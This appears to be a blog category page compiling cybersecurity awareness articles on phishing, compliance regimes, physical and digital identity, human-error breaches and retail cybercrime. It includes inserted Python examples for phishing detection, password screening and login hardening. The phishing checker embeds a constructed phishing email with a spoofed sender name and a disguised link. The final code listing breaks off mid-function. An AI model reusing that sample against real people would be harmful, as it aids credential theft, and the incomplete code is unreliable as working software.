Category: All

Cybersecurity: awareness is only the first step

European Cyber Security Month (ECSM) is an annual campaign designed to raise awareness of the many threats that individuals and organisations face in today’s ever more connected world.

Whether it be malicious hacking, malware, espionage or data loss, we are more at risk of becoming victims of cybercrime than ever before, and the trend shows no sign of slowing.

The end goal of ECSM is not only to raise awareness of cybersecurity issues, but also to promote best practice, provide access to the resources required to fight cybercrime and, of course, to educate users and decision-makers about the risks they face.

While bringing awareness to an issue is important, one month of highlighting cyber security issues just isn’t enough. Attackers operate 24 hours a day, 365 days a year, and it would be foolhardy not to ensure your defences operate to the same timeframe.

The ever-growing threat

When national security, personal safety and business continuity are at stake, everyone should not only be aware of the threat, they should be taking action. Society accepts this when it comes to environmental and physical threats, so why are we so disengaged when it comes to cyber security?

Cyber security doesn’t just affect a person, but everyone around them. And in the globally connected world we live in, that literally is everyone. Infected devices have a way of infecting other devices, and compromised systems can make everyone vulnerable. So cyber security isn’t just about protecting you – it’s about protecting all of us.

The UK’s National Cyber Security Centre recently revealed that it had handled 658 incidents affecting almost 900 organisations, including schools, airports and emergency services, and said the attacks pose ‘strategic national security threats to the UK’. The spread of cyber-attacks should come as no surprise. The number of internet-enabled devices is skyrocketing. Already there are seven billion internet-connected devices globally, and IoT Analytics predicts that number will more than triple to over 21 billion by 2025. Thanks to the Internet of Things there is now web-enabled software in everything from planes to fridge-freezers. In an era where espresso machines have IP addresses and speakers are connected to the internet, keeping safe takes real effort.

The threat is very real, and very immediate. And where the attacks are coming from is a cause for serious concern.

Increased sophistication

Gone are the days when the only concern was the lone attacker in a hoodie in his bedroom. While that stereotype might have held over 20 years ago, organised criminal gangs quickly got in on the action, stealing credit card details and testing the IT infrastructure of retail banks to its limits. More recently, ‘hacktivists’ such as Wikileaks have sought to expose the malpractices and secrets of big businesses and powerful governments. And in the last few years state-sponsored attacks have become steadily more common, with accusations of foreign interference in domestic votes (the US, France, Brexit) a massive concern. The transition from the teenager’s bedroom to the upper echelons of power has been frighteningly quick.

It is imperative that we move from a state of apathy to a state of national readiness when it comes to cyber threats. Cyber-attacks are getting more sophisticated, and are having real life consequences for nations, organisations and citizens. The fightback must begin.

The steps we must all take


Businesses need to own their IT. “Owning” your digital estate means taking stock of the apps, appliances and other IoT devices that hold and use personal and corporate data on a daily basis. Device management tooling, backed by encryption of data at rest and in transit, then provides both visibility into and control over complex, interconnected IoT systems: which devices exist, whether each one is authenticated before it joins the network, and whether its data and control traffic are protected from tampering.

Only after building a complete picture of your personal and organisational cyber landscape can you begin securing it. One widely cited estimate holds that 95 per cent of successful attacks on enterprise networks start with a spear phishing email. Identifying a phishing attempt is the first step: when an email makes you unsure, check the actual sender address rather than the display name, and the real destination of any link rather than the text it is labelled with. On a technological level, multi-factor authentication and dynamic security policies can limit the damage of even a successful phish. One caveat: one-time codes sent by SMS or generated by an app can themselves be phished and relayed in real time, so phishing-resistant factors such as FIDO2 security keys, which bind the login to the genuine site, are the stronger choice for high-value accounts.
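The two checks in the paragraph above, sender address versus display name and link text versus real destination, are easy to automate for a suspicious message. The script below is an added example, not code from the original post or from BlackBerry; the two messages it inspects are constructed, and every address and domain in them (example-corp.com, mail-example-corp.co, login-verify.example) is hypothetical. Its domain comparison uses the last two DNS labels, a deliberate simplification that does not handle suffixes such as co.uk.

```python
import email
import re
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample messages (all addresses and domains are hypothetical).
# PHISH puts a corporate address in the display name and hides the real
# destination behind link text that reads like the corporate SSO URL.
PHISH = b"""From: "helpdesk@example-corp.com" <alerts@mail-example-corp.co>
To: alice@example-corp.com
Subject: Password expiry notice
Content-Type: text/html; charset="utf-8"

<html><body><p>Your password expires today. Sign in at
<a href="http://example-corp.com.login-verify.example/reset">https://sso.example-corp.com/reset</a>
to keep your account.</p></body></html>
"""

CLEAN = b"""From: "Example Corp IT" <helpdesk@example-corp.com>
To: alice@example-corp.com
Subject: Password expiry notice
Content-Type: text/html; charset="utf-8"

<html><body><p>Sign in at
<a href="https://sso.example-corp.com/reset">https://sso.example-corp.com/reset</a></p></body></html>
"""


def registrable(host: str) -> str:
    """Last two DNS labels, lower-cased. Simplification: it does not know
    public suffixes such as co.uk, so treat the comparison as a heuristic."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if labels[0] else ""


def sender_check(raw: bytes) -> dict:
    """Compare the domain the display name claims with the domain of the
    actual From address."""
    msg = email.message_from_bytes(raw)
    name, addr = parseaddr(msg.get("From", ""))
    addr_domain = registrable(addr.partition("@")[2])
    # An address- or domain-looking token inside the display name,
    # e.g. "helpdesk@example-corp.com" used as a name.
    m = re.search(r"@([\w-]+(?:\.[\w-]+)+)|\b([\w-]+(?:\.[\w-]+)+)\b", name)
    display_domain = registrable(m.group(1) or m.group(2)) if m else ""
    return {
        "display_name": name,
        "address": addr,
        "display_domain": display_domain,
        "address_domain": addr_domain,
        "mismatch": bool(display_domain) and display_domain != addr_domain,
    }


class _Anchors(HTMLParser):
    """Collects (href, visible text) for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def link_check(raw: bytes) -> list:
    """Flag anchors whose visible text is a URL or host name pointing
    somewhere other than the real href."""
    msg = email.message_from_bytes(raw)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        charset = part.get_content_charset() or "utf-8"
        body = part.get_payload(decode=True).decode(charset, "replace")
        parser = _Anchors()
        parser.feed(body)
        for href, text in parser.links:
            # Only compare when the visible text itself reads as a URL/host.
            candidate = text if "://" in text else "//" + text
            text_host = (urlparse(candidate).hostname or "").lower()
            if not re.fullmatch(r"[\w-]+(?:\.[\w-]+)+", text_host):
                continue
            href_host = (urlparse(href).hostname or "").lower()
            if registrable(text_host) != registrable(href_host):
                findings.append({"text": text, "href": href,
                                 "text_domain": registrable(text_host),
                                 "href_domain": registrable(href_host)})
    return findings


def analyse(raw: bytes) -> list:
    """Human-readable findings for a message; empty when nothing looks odd."""
    out = []
    s = sender_check(raw)
    if s["mismatch"]:
        out.append(f"display name claims {s['display_domain']} "
                   f"but mail comes from {s['address_domain']}")
    for f in link_check(raw):
        out.append(f"link shows {f['text_domain']} but goes to {f['href_domain']}")
    return out


if __name__ == "__main__":
    for label, raw in (("PHISH", PHISH), ("CLEAN", CLEAN)):
        print(label, analyse(raw) or ["no findings"])
```

Run against a real message, feed it the raw RFC 822 bytes (for example from a saved .eml file). A finding is a reason to treat the mail as suspect, not proof of phishing; legitimate bulk mailers also send from domains that differ from the brand named in the display name, which is exactly why the check has to be a human decision backed by the data the script exposes.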

The most important thing to remember about cybercriminals is that more often than not they rely on human error to gain access to systems. Continued employee awareness training can help strengthen cybersecurity defences by lowering the risks associated with human error.

Businesses should also make sure strong security processes are in place, including ensuring employees use strong, unique passwords. Yes, Password123456 – I’m looking at you. One caveat to the traditional advice of forcing regular changes: current NIST guidance (SP 800-63B) recommends against mandatory periodic rotation, because it pushes people towards predictable variations of the same password. Screen new passwords against lists of common and breached passwords instead, and require a change when compromise is suspected.
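What the NIST SP 800-63B style of password screening mentioned above looks like in practice: a minimum length, a deny list of common and breached passwords (matched after stripping the “123456!” tails people bolt onto dictionary words), rejection of context-specific words such as the username, and rejection of trivial repeated or sequential runs, instead of composition rules and scheduled rotation. This is an added example, not code from the original post; its deny list is a constructed handful of entries standing in for a breach-derived corpus, and the function names are my own.

```python
import re
import unicodedata

# Constructed miniature deny list. In production, screen against a
# breach-derived corpus (NIST points at lists of compromised and commonly
# used passwords) rather than this handful of entries.
COMMON_PASSWORDS = {"password", "qwerty", "letmein", "welcome", "admin",
                    "123456", "iloveyou", "football"}

MIN_LENGTH = 8  # NIST SP 800-63B minimum for user-chosen passwords


def core_word(password: str) -> str:
    """Lower-case, Unicode-normalise and strip the digit/punctuation tail,
    so that 'Password123456!' is compared to the deny list as 'password'."""
    pw = unicodedata.normalize("NFKC", password).lower()
    return re.sub(r"[\d\W_]+$", "", pw)


def has_run(password: str, length: int = 4) -> bool:
    """True for repeated ('aaaa') or sequential ('1234', 'abcd', 'dcba')
    runs of at least the given length."""
    pw = password.lower()
    for i in range(len(pw) - length + 1):
        chunk = pw[i:i + length]
        steps = {ord(b) - ord(a) for a, b in zip(chunk, chunk[1:])}
        if steps in ({0}, {1}, {-1}):
            return True
    return False


def screen_password(password: str, username: str = "", service: str = "",
                    deny_list=COMMON_PASSWORDS) -> list:
    """Return the reasons a password should be rejected; an empty list
    means it passes. No composition rules are applied on purpose."""
    reasons = []
    if len(password) < MIN_LENGTH:
        reasons.append("too_short")
    core = core_word(password)
    if core in deny_list or password.lower() in deny_list:
        reasons.append("common")
    low = password.lower()
    if username and username.lower() in low:
        reasons.append("contains_username")
    if service and service.lower() in low:
        reasons.append("contains_service")
    if has_run(password):
        reasons.append("sequence")
    return reasons


if __name__ == "__main__":
    for candidate in ("Password123456", "alice2024", "correct horse battery staple"):
        print(repr(candidate), screen_password(candidate, username="alice") or "ok")
```

The screening rejects the page’s own example, Password123456, twice over (it is a deny-listed word with a sequential tail), while a long passphrase with no dictionary hit passes without needing digits or symbols. Bolt the function onto the password-change path, not onto a periodic expiry job.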

Keep your software updated to the latest available version, because updates often include fixes for publicly disclosed vulnerabilities that attackers are quick to exploit. Also be wary of public Wi-Fi, especially in new locations: hotels and other public spaces are attractive to criminals because anyone on the same unsecured network can observe or tamper with unencrypted traffic, so use a VPN or make sure every connection is TLS-protected.

And this isn’t only for the grown ups’ table. Just as we teach our kids to lock up their bikes, parents and teachers need to remind children to protect their phones and other devices with passwords. And children need to know that some things in life need to be kept secret!

Stop. Think. Connect.

The organisations behind the Stop. Think. Connect. campaign remind people to:

STOP: Before you use the Internet, take time to understand the risks and learn how to spot potential problems.

THINK: Take a moment to be certain the path ahead is clear. Watch for warning signs and consider how your actions online could impact your safety, or your family’s.

CONNECT: Enjoy the Internet with greater confidence, knowing you’ve taken the right steps to safeguard yourself and your computer (and other devices). 

In a world where cybercrime is to be expected, it is high time we ensure security at all times, not just when awareness is at a peak.


Campbell Murray is Global Head at BlackBerry. Today’s BlackBerry is a software company with a standard of security for managing the network of mobile and wearable devices, desktops and laptops, and other endpoints within enterprises. In addition to developing and providing applications, our BlackBerry Secure platform enables enterprises and independent developers to create applications for smartphones, medical devices, connected cars, consumer appliances and industrial machinery, and much more.

Original post is from Technative


COMPLIANCE ACROSS INDUSTRY: CYBERSECURITY COMPLIANCE REQUIREMENTS BY INDUSTRY SERIES

In the previous six articles, we’ve looked at how cyber security is impacting different industry sectors: healthcare, financial services, manufacturing, automotive, energy and retail. Each sector has its own cyber security pain points, and there is, of course, much overlap as well. Phishing is an issue across all sectors, likely because it exploits human behaviour, and for that reason it is a very successful attack vector. To counter the onslaught of cyber threats against our nation’s industries, each sector has compliance measures and regulations in place that specifically address security and privacy requirements. In this final, round-up article, we’ll look at the compliance expectations of each sector, and how those guidelines should fit into any industry sector security strategy.

Healthcare Compliance and Regulations

Healthcare is a data-rich industry sector and as such has extensive security regulations to adhere to. The main bodies of regulation used within this sector are the Health Insurance Portability and Accountability Act (HIPAA) and the Health Information Technology for Economic and Clinical Health Act (HITECH).

HIPAA was introduced in 1996. Its Privacy Rule governs how Protected Health Information (PHI) may be used and disclosed, and its Security Rule sets the administrative, physical and technical safeguards required for PHI held electronically. PHI has a very wide scope: it includes identifying information such as name and address, but also medical records and even genetic data. HIPAA is meant to strike a balance between protection and usability of PHI, because it is important to keep health data flowing and available for better care. The rules cover health plans, healthcare providers and healthcare clearing houses and, importantly, their ‘business associates’. This means the extended ecosystem of third-party vendors used by healthcare organisations also needs to be HIPAA compliant, and a healthcare CIO is responsible for ensuring that third-party vendors take due care of any PHI that comes under their remit.

HITECH was introduced in 2009 as a way of encouraging the adoption of Electronic Health Records (EHR). HITECH is a separate law from HIPAA, but the two work together: HITECH strengthened HIPAA enforcement, raised the civil penalties for non-compliance and introduced the breach notification requirement.

The HIPAA Omnibus Rule, introduced in 2013, implemented the HITECH changes and strengthened HIPAA’s security and privacy requirements, including making business associates directly liable for compliance. Under the Breach Notification Rule, affected individuals must be notified of any breach of unsecured PHI; breaches affecting 500 or more individuals must also be reported to the U.S. Department of Health and Human Services (HHS) within 60 days and are listed publicly on the HHS breach portal, while smaller breaches are reported to HHS annually.

Financial Services Compliance and Regulations

The financial services industry focuses on the protection of financial data, including payment card information. Compliance requirements across the industry are complex and can be country specific. The Payment Card Industry Data Security Standard (PCI DSS) specifically covers the handling and management of payment card data. It is not a law but an industry standard, enforced through the contracts that merchants and service providers hold with the card brands and their acquiring banks, and it covers all aspects of card data handling: acquiring, transmitting, storing and processing. PCI DSS compliance follows a cycle of assess, remediate and report: understand your IT assets and the processes that touch card data, fix any vulnerabilities found, keep records, and submit compliance reports to the banks and card brands the company is associated with. Financial services companies need to ensure that their services can be PCI DSS compliant.

The Sarbanes-Oxley Act was brought in to protect the public from fraudulent financial reporting by corporations in general, but it also impacts the financial sector. Its main thrust is which records must be retained and for how long, and it requires security measures to protect the integrity of those stored records.

Payment protection is one area of compliance, but this doesn’t remove the requirement to also protect Personally Identifying Information (PII) – see ISO/IEC 27001 below.

Manufacturing Compliance and Regulations

There are a plethora of regulations covering the manufacturing industry, some specific to the product type, e.g. toy manufacture. In terms of security, the industry has to cover areas as diverse as data protection, IT safety and security, and health, safety and environmental impact. One of the most widely adopted security standards in this sector is the ISO/IEC 27000 series, and in particular ISO/IEC 27001. It is a standard rather than a regulation, applied across all industry sectors, and it is designed to establish an information security management system within an organisation. It addresses risk across a company’s IT systems, including how IT security is managed, access control, operations security and even human resource security. Certification against ISO/IEC 27001 is an intensive process in which the company must meet all of the applicable requirements. (The 2013 edition referred to in this series has since been superseded by ISO/IEC 27001:2022, which keeps the same management-system structure with an updated control set.)

Automotive Compliance and Regulations

The automotive industry, as a sub-sector of manufacturing, has to meet the compliance requirements of that industry. However, manufacturers’ finance arms and dealers also offer financing packages for car purchases, and as such also need to meet various financial regulations, such as PCI DSS.

The sector also looks to ISO/IEC 27001 to ensure that customer and supplier information is kept safe, and to make sure its vendor ecosystem conforms to the remit of the standard.

The automotive industry has specific requirements in terms of vehicle safety too. As the industry embraces the IoT and driverless cars, regulation covering those specifics was expected to arrive as extensions to existing rules; it has since arrived in its own right, with UNECE Regulation No. 155 requiring a cyber security management system as a condition of vehicle type approval, and ISO/SAE 21434 setting out cyber security engineering for road vehicles.

Energy Compliance and Regulations

The North American Electric Reliability Corporation (NERC) sets the compliance requirements for the bulk electric system operators that fall under the banner of energy. NERC specifically looks after the cyber security expectations of the sector and, more recently, the impact of cybersecurity on the Smart Grid.

The sector is specifically covered by NERC’s Critical Infrastructure Protection (CIP) standards, numbered from CIP-002 upward (CIP-002 to CIP-009 in the original set, with later standards such as CIP-010, CIP-011, CIP-013 and CIP-014 added since). A BES (Bulk Electric System) Cyber System is the term used for the cyber assets that require protection, which includes SCADA, industrial control systems and their associated control units.

Retail Compliance and Regulations

One of the main regulations overseeing security in the retail sector is PCI DSS, which controls the handling and management of payment card data and also covers Point of Sale (POS) transactions. This sector is a major target for data theft, so it is also under pressure to protect PII. Retail outlets build online stores that require customers to create accounts holding Personally Identifying Information, such as name, address and email address, and these data need to be protected using frameworks such as ISO/IEC 27001.

Many of the standards and regulations apply across industries. This makes sense in light of the cross-industry attack vectors, many of which we have explored in each of the six industry sector articles. Although some sectors have specific needs, such as healthcare, all require a strategic approach to ensuring that the often complex compliance requirements can be met. It can take many months to get through the onerous requirements of standards such as ISO/IEC 27001, but the protection that a well thought through and regulated cyber security strategy offers is worth it in the long run, especially in light of the enormous efforts made by today’s cyber criminals.


When Digital Identity and Access Management Meets Physical Security

Where does digital security end and tangible, or physical, security begin? In today’s cybersecurity ecosystem, I’d argue that it’s all just security. In fact, if you are handling these domains in discrete silos, your cyber resilience is already taking a hit.

If your identity and access management (IAM) and physical security initiatives are not working as one, your organization may be suffering from unnecessary grief — and increasing risk.

When Physical and Digital Security Became One

Pinpointing exactly when these two previously discrete functions became one is up for discussion, and some may not even agree that they have become one at all. Regardless, it will be hard to envision them as discrete issues for much longer, particularly as the industry pushes the digital transformation envelope.

At the most basic level, IAM is a username/password credentialing system that gives a single layer of authentication. Best practice says to add a second factor or multifactor authentication (MFA) to the process. But there is a more basic question: even if you’re using MFA, ask yourself, given today’s deceptions, has an identity truly been authenticated?

Not exactly, because in the scenario described, we are only authenticating credentials, not identity. Similar to physical identity and access management (PIAM), which unifies your physical and IT security systems, there is something called dynamic identity management, a next-gen solution gaining some support from major industry players that makes an effort to address the identity issue.

To best explain dynamic identity management, think of a mishmash of facial recognition, internet of things (IoT) sensors and monitors, and risk profiling. You walk into your workplace, a facial recognition system verifies your identity and, based on the risk profile assigned to you, you are allowed access to certain areas, both physical and digital, of the enterprise’s assets.

This certainly sounds like a combined solution that addresses both IAM issues and physical security challenges. From a security perspective, this approach looks fantastic.

But it’s also a brewing privacy nightmare.

Where Security Meets Privacy at the Workplace

Employers and employees generally expect some oversight and monitoring of behavior to occur in the workplace. But when the combination of identity and access management and physical security turns into a form of continuous monitoring that captures what time you get up from your desk and which bathroom in the office you’re using, it’s only a matter of time before privacy is violated.

Furthermore, if the security restrictions become too strict, you end up impacting workflow. Can you imagine what hospital operations would look like in the ER if a doctor or nurse were slowed down due to some IoT sensor failing?

With all the new technological innovations happening right now, it’s a short hop, skip and jump from robust security to behavior control in the workplace — something that, paradoxically, can kill the innovation of organizations. Building out your combined solution will always go back to your risk tolerance. The IBM Institute for Business Value (IBV)’s executive report, “Digital Transformation: Creating New Business Models Where Digital Meets Physical,” captures the essence of this security challenge: “The challenge for business is how fast and how far to go on the path to digital transformation.”

Put differently, before an enterprise makes a decision about which digital transformation path it will take, it should have a relatively good sense of what its security posture should look like post-transformation. Not defining the expected end state can create a huge blind spot that will not only impact security posture, but will also impact business operations as a whole. What’s more, you need to ensure your transformation is trusted by your users, otherwise you’re increasing the likelihood of legal challenges and ethical dilemmas coming toward your enterprise.

Don’t Be Afraid of Low Tech

For the reasons outlined above, there’s a case to be made for some more “archaic” solutions. These include sound human intelligence, situational awareness, and good old-fashioned holistic assessments and education campaigns. For all the gadgetry you integrate into your enterprise, at least in 2019, there is no replacing the gut instinct and human innovation. After all, it is human innovation — albeit sometimes with technical assistance — that circumvents security measures.

The “human touch” needs to be a critical part of identity and access management and physical security systems. The human is where these two issues meet, and trying to move all human security interaction to something more passive will ultimately raise your risk profile, not lower it.

Which is better positioned to see if something is amiss: an IoT sensor, or an employee who knows Johnny shouldn’t be in that part of the building? These are the small vulnerabilities we need to be sensitive to, because for all the wonder and benefit that things like artificial intelligence bring to cybersecurity, we still want to ensure that we are using this great technology as a tool and not a crutch.

Looking further into the future, as you consider which digital transformation strategy will best meet your security needs, remember that there is a technological wildcard waiting to play in the big leagues: quantum computing. A sufficiently large quantum computer would break the public-key cryptography (RSA, elliptic curve) underpinning today’s certificates, signatures and key exchange, and with it the credentialing systems built on them; symmetric ciphers and hash functions are affected far less, and the post-quantum algorithms NIST has been standardising (the first were published in 2024) are the migration path. We’re not dealing with apples-to-oranges comparisons here; it’s more like apples to locomotives. When quantum computing takes hold, we will not be talking about digital transformation anymore, but instead quantum transformation.

Key Digital Transformation Takeaways

Because there is so much going on in this space today, it’s worth summarizing some key takeaways.

First, identity and access management and physical security tasks need to be dealt with as one joint task, not two separate ones. Treating them as separate may be a sign that your teams are not aligned internally.

Second, next-gen identity and access management systems, such as those that integrate biometrics and IoT sensors, have incredible potential, but also come with intangible concerns, such as privacy issues. These issues need to be addressed concurrently as part of any digital transformation effort.

Third, before any digital transformation undertaking, make sure you know what the end state is supposed to look like. Not only might you be building more risk and fragility into your system than you bargained for, but new technologies on the horizon may completely alter the expected return on your investment.

Lastly, don’t overlook the human component when facing the digital/physical security challenge. Humans are the glue that connect these two realms — and a critical part of successful digital transformation.

Original post is from Security Intelligence


Businesses have never been more at risk of data breaches

A recent report by DLA Piper found that European companies suffered 60,000 data breaches in the 8 months following the GDPR laws coming into force, equating to one every 5 minutes. Ransomware attacks are also growing by more than 350% annually, while 70% of businesses felt that their security risk increased significantly as recently as 2017.

The reports certainly seem to be reflected in the media, with Microsoft, Facebook and even home improvement retailer B&Q reporting data breaches in recent months. Both Microsoft and Facebook suffered sophisticated hacks, yet B&Q’s records of store thieves were exposed simply because they were stored in an open-source search engine that had never been configured to require authentication.

This reflects an often overlooked truth about data breaches; although cyber attacks receive more attention in the press, it is more often human error or simple negligence that results in data breaches.

The Information Commissioner’s Office revealed in its annual report for 2017/18 that four of the five leading causes of data breaches could be attributed to human error:

  1. Data sent by email to the incorrect recipient
  2. Data posted or faxed to the incorrect recipient
  3. Loss or theft of paperwork
  4. Failure to redact data

Human beings are fallible, and the mistakes of an individual can jeopardise the entire business. Indeed, the notorious Equifax breach of 2017, which leaked the personal data of nearly 146 million Americans, was reportedly down to one employee repeatedly failing to apply a published patch for a web framework vulnerability (in Apache Struts) that would have prevented the breach.

Given the fact that a company’s employees can often be the weak link in its data security strategy, it is imperative that company directors understand which areas of the business are the most liable to cause a data breach.

1.    Remote Workers

One type of employee that risks putting the wider business at risk is the remote worker. Telecommuting is an increasingly common working arrangement whereby employees are occasionally permitted to work from home, which has led to around 70% of people globally working remotely at least one day a week.

However, remote work carries additional security risks. An employee working on a company laptop in a coffee shop may be using a Wi-Fi network that is not secure, where anyone on the same network can observe unencrypted traffic or impersonate the hotspot, so unencrypted connections and weak device settings can hand even an unsophisticated attacker access to company data. Additionally, few employees can avoid using paper files, and these confidential documents can quickly become lost or stolen in public places.

Employers should therefore clearly outline their remote employees’ responsibilities regarding confidentiality and data protection. They must also establish device security policies that remove the scope for costly mistakes, such as by specifying that all file downloads should be work-related. Other advisable policies include implementing device monitoring, rigorous password protection and asking that devices and files are only used in specific locations with secure Wifi networks.

2.    Administration department

Another vulnerable area of any business is the administration department. Responsible for a business’ financial planning, record keeping and logistics, an administrator is often the backbone of an organisation. An administrator’s role is therefore crucial for avoiding a data breach, as if any of their responsibilities are performed incorrectly sensitive data could quickly be obtained by malicious third parties.

With so many documents moving through the admin department every day, sensitive information found on meeting notes, tax forms and financial reports can become lost or stolen if an effective process is not in place. A prerequisite should therefore be establishing a clean desk policy in the office, whereby all employees are required to declutter their workspaces at the end of each day.

By implementing this rule, administrators will find it far easier to store and destroy sensitive documents. Any data still in use and held in hard copy should be locked in storage cabinets overnight, with the most important files stored off-site at a secure information management facility. Furthermore, documents that are no longer needed should be shredded immediately rather than thrown in waste bins, where they can be found and potentially used for blackmail or fraud.

3.    Complacent managers

Complacency is perhaps the most common reason for a data breach, and higher-level managers who fail to promote data security best practices pose the greatest risk. Managers are responsible for setting the standard in cybersecurity, but if they become complacent in implementing security awareness programmes their employees may begin to also forget their training.

Poor password management, opening suspect emails and leaving computers unlocked are all practices that creep into a business’ culture if an example is not set at the top. Managers should regularly remind their staff to use strong, unique passwords (and to change any that may have been exposed) and to lock their devices, and they should also arrange for external training to be made available to all staff.

For example, managers should invest in up-to-date e-learning training sessions for both online and offline security, as well as invite IT experts to teach employees about common hacking risks and how they should respond to a successful data breach.

Key Takeaways

The rising threat of cyber attacks is undeniable, and companies of all shapes and sizes should ensure preparations are made to deal with direct attacks. However, businesses cannot afford to neglect the cost of mistakes made by staff and any budget set aside for cybersecurity should include resources for comprehensive training and secure document storage and disposal. Only then can the risk of human error be minimised.

This post originates from technative.io.


Top Privileged Access Management Use Cases

Privileged Access is everywhere. Privileged accounts can be found in every networked device, database, application, and server on-premises and in the cloud. Privileged users have the “keys to the kingdom” and, in the case of a cyberattack or data breach, privileged credentials can be used to cause catastrophic damage to a business. Begin by securing these 6 critical areas with a Privileged Access Management solution. View this infographic to discover where to start.

Download the “Top Privileged Access Management Use Cases” infographic: Infographic-Privileged-Access-Fundamentals.pdf (1 MB)


CYBERCRIME AND INDUSTRY #6: HOW CYBERCRIME IS AFFECTING THE RETAIL INDUSTRY

It is an arguable point, but the retail sector has probably changed more than any other industry area in the last 20 years. This is mostly down to the globalisation of retail through online sales, but it is also because of innovation in marketing and consumer loyalty. For example, in 2016 so far, $300 million has been invested in retail technology start-ups. And we love to shop: the expected online retail spend in 2016 is $1.67 trillion, and this figure is only going to grow through 2020 at least.

The issue that retail has as it expands its business by embracing the Internet as a sales platform is the same as in other industry sectors: it is opening itself to cyber criminals as well as shoppers.

Retail, like many other sectors, is feeling the pinch in terms of costs of cyber attacks. 

Some of the largest breaches to date have occurred in the retail sector including 145 million customer passwords stolen from eBay, 40 million payment cards and 70 million personal account details stolen from Target Corp, and a breach at Home Depot affecting 56 million customer payment cards.

What sorts of cyber crimes affect the retail sector?

According to the Verizon Data Breach Investigations Report 2016, retail saw the greatest cyber threats in the following three main areas:

●      Web app attacks: the web application itself is targeted. The usual vectors are phishing administrator credentials, or exploiting software vulnerabilities and then installing backdoor malware to slowly exfiltrate data. DDoS against the application is also counted here.

●      Point of Sale (POS) attacks: remote intrusions into POS systems. Malware that captures card data on the terminal, whether keyloggers or memory scrapers, is the main tool, and retailers of every size are targeted because POS assets are now internet-enabled.

●      Payment card skimmers: here the card reader or POS device has to be physically tampered with, typically by organised gangs. It mainly affects bank ATMs and fuel pumps, but merchants are still at risk.

A particularly interesting finding by Verizon was that “97% of breaches featuring stolen credentials leveraged legitimate partner access”. This implies that retail has a major issue with securing the supply chain and managing the risk of third parties.

What are the specific pain points of retail?

The Retail Cyber Intelligence Sharing Center (R-CISC) has identified a number of areas that makes retail stand out in the cyber security risk mitigation stakes. These areas make retail a particular type of target for cybercriminals and include:

●      High turnover of staff. This means that insider threats are more likely.

●      Holding of payment card data which needs to be PCI compliant. This presents issues in dealing with third parties in the supply chain, who have also to be PCI compliant if they in any way manage financial data.

●      Customers are also potential threats. This may be unique in the retail industry where the customer has the potential to commit fraud.

●      Having a widely dispersed attack surface. Many retail outlets have a wide geographic reach in terms of outlets as well as having an online presence.

Retailers have other pressures too that, although not unique to this sector, are a focus of attention. Retailers have a number of peak seasons, such as Black Friday, Cyber Monday and Christmas, which are known to be extremely busy and so a target for fraud and sabotage. Cyber Monday 2015 saw the highest ever sales, with $3.19 billion spent in a single day. Cybercriminals have been targeting websites specifically to cause chaos on very busy days like Cyber Monday, using Distributed Denial of Service (DDoS) attacks that knock websites and apps over. In 2014 the WordPress shopping cart Cart66, used by large numbers of retailers to add shopping cart functionality to their sites, suffered a massive DDoS attack. Akamai has found that DDoS attacks increased by around 22.5% between 2014 and 2015, with retail the most popular DDoS target.

Can retail stop the tidal wave of cybercrime?

Retail analysts eMarketer have predicted that by 2017 over 51% of Americans will make at least one online purchase using a smartphone, accounting for over $75 billion in sales. As retail embraces online purchasing and mobile buying becomes the normal way to shop, we can expect more mobile-based threats to emerge. But mobile threats are by now a well-understood vector, and e-commerce has an opportunity to nip this one in the bud.

One of the key areas that must be addressed to mitigate web-based and, ultimately, app-based threats is hardening the software behind the scenes. Mobile and web app development has to be treated as a secure coding exercise, following the guidance of the Open Web Application Security Project (OWASP). Many smaller retailers build their sites on third-party platforms such as WordPress and its plugins. Relying on third-party code means you have to be especially vigilant: choose plugins and apps with a good security track record, and keep them updated.

One of the weak points of web and mobile app security is authentication. As noted above, Verizon found that almost all breaches involving stolen credentials came through legitimate partner access. Retailers should therefore make hardening authentication a priority, especially for administrator and privileged access granted to supply chain vendors. Putting security measures in place for known threats, using security intelligence from the likes of the National Institute of Standards and Technology (NIST) and R-CISC, will change the future retail threat landscape from one of major breaches to a much more controlled environment, making it safe for all of us to shop online.
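The following is an added example, not code from the original article or from any retailer or platform it mentions, of what hardening authentication for administrator and vendor access looks like in practice: salted PBKDF2 password hashing with a constant-time comparison, a lockout after repeated failures, and vendor accounts that are both time-bound and restricted to an allowlisted source network. The in-memory account store, the lockout thresholds, the iteration count and the network ranges are assumptions chosen for the illustration.

```python
"""Hardened login for administrator and vendor accounts (added example).

Assumptions (not from the article): an in-memory account store, PBKDF2-HMAC-SHA256
for password storage, a lockout policy of 5 failures / 15 minutes, and vendor
accounts that carry an expiry time and a source-network allowlist.
"""
from __future__ import annotations

import hashlib
import hmac
import ipaddress
import secrets
import time
from dataclasses import dataclass, field

PBKDF2_ITERATIONS = 600_000   # OWASP's current recommendation for PBKDF2-HMAC-SHA256
MAX_FAILURES = 5              # assumed lockout policy
LOCKOUT_SECONDS = 15 * 60


@dataclass
class Account:
    username: str
    salt: bytes
    pw_hash: bytes
    role: str                                  # "admin", "vendor" or "staff"
    allowed_networks: list = field(default_factory=list)  # vendor-only source allowlist
    expires_at: float | None = None            # vendor access is time-bound
    failures: int = 0
    locked_until: float = 0.0


def hash_password(password: str, salt: bytes) -> bytes:
    """Salted, slow hash: a leaked table cannot be reversed quickly or reused across sites."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


def create_account(username: str, password: str, role: str, allowed_networks=(),
                   lifetime: float | None = None, now: float | None = None) -> Account:
    now = time.time() if now is None else now
    salt = secrets.token_bytes(16)
    return Account(username, salt, hash_password(password, salt), role,
                   [ipaddress.ip_network(n) for n in allowed_networks],
                   None if lifetime is None else now + lifetime)


def authenticate(acct: Account, password: str, source_ip: str,
                 now: float | None = None) -> tuple[bool, str]:
    """Return (granted, reason). Cheap policy checks run before the expensive hash."""
    now = time.time() if now is None else now
    if now < acct.locked_until:
        return False, "locked"
    if acct.expires_at is not None and now > acct.expires_at:
        return False, "expired"
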